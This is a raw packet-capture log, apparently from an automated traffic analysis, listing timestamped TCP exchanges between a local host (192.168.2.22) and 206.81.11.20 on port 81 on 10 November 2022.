Nov 10, 2022 11:43:11.971390963 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971409082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971426964 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971436024 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971445084 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971463919 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971467972 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971481085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971499920 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971513987 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971518040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971535921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971554995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971573114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971580982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971590042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971601009 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971609116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971626997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971646070 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971664906 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971683979 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971697092 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971698046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971704006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971719027 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971723080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971741915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971748114 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971760988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971777916 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971798897 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971805096 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971822977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971837997 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971841097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971858978 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971873045 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971877098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971894026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971900940 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971910954 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971930027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971947908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971947908 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971966028 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971977949 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971983910 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972002983 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972011089 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972021103 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972040892 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972042084 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972058058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972076893 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972089052 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972095013 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972112894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972122908 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972130060 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972147942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972156048 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972167015 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972184896 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972188950 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972203970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972223043 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972242117 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972259045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972259998 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972276926 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972295046 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972310066 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972312927 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972331047 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972341061 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972347021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972364902 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972377062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972383022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972400904 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972405910 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972419024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972436905 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972449064 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972454071 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972470999 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972481012 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972495079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972512960 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972531080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972531080 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972548962 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972568989 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972587109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972598076 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972604990 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972623110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972630978 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972640991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972659111 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972676039 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972681999 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972693920 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972711086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972728968 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972728968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972745895 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972764015 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972771883 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972783089 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972800970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972806931 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972819090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972837925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972846985 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972855091 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972873926 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972883940 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972893000 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972913980 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972922087 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972933054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972950935 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972961903 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.972970963 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972987890 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.972997904 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973006010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973023891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973032951 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973041058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973058939 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973067999 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973076105 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973104000 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973474979 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973642111 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973660946 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973678112 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.973691940 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.973715067 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.003681898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.003766060 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.003942013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.003983974 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004004955 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004023075 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004043102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004065037 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004079103 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004103899 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004118919 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004142046 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004159927 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004180908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004206896 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004219055 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004237890 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004257917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004275084 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004296064 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004309893 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004355907 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.004939079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.004996061 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005065918 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005106926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005124092 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005146980 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005163908 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005186081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005198002 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005234957 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005258083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005295992 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005311966 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005333900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005348921 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005376101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005389929 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005429029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005445004 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005482912 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.005500078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.005533934 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.023789883 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.023859024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.023900986 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.023941040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.023983955 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.023984909 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024025917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024044991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024072886 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024081945 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024113894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024153948 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024172068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024203062 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024243116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024260998 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024283886 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024326086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024338007 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024375916 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024418116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024431944 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024457932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024498940 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024513006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024540901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024581909 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024590015 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.024624109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.024671078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.027616024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027683020 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027729988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027771950 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.027774096 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027817011 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027839899 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.027858973 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027899981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027918100 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.027940989 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.027982950 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028002024 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028024912 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028070927 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028081894 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028112888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028156996 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028168917 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028198004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028238058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028253078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028279066 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028321981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028338909 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028362989 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028404951 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028419971 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028445005 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028486967 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028501987 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028529882 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028568983 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028584957 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028609991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028650045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028667927 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028691053 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028732061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028747082 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028773069 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028814077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028832912 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028855085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028898954 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028917074 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.028939962 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028979063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.028999090 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029020071 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029064894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029071093 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029105902 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029148102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029170990 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029187918 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029227972 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029248953 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029273033 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029314041 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029325962 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029355049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029397964 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029409885 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029448032 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029469013 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029510021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029525995 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029550076 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029591084 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029608011 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029630899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029671907 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029685020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029712915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029746056 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029786110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029798031 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029827118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029844046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029867887 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029908895 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029920101 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.029952049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.029994011 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.030004025 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.030034065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.030077934 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.030086994 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.030201912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.030719042 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068361044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068437099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068495035 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068526983 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068674088 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068739891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068758965 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068799973 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068825960 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068841934 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068854094 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068886042 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068901062 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068928003 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068928003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.068969965 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.068983078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069013119 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069024086 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069034100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069061995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069067955 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069103956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069144964 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069186926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069242001 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069264889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069300890 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069314003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:12.069654942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069756985 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069802046 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:12.069838047 CET	49172	81	192.168.2.22	206.81.11.20
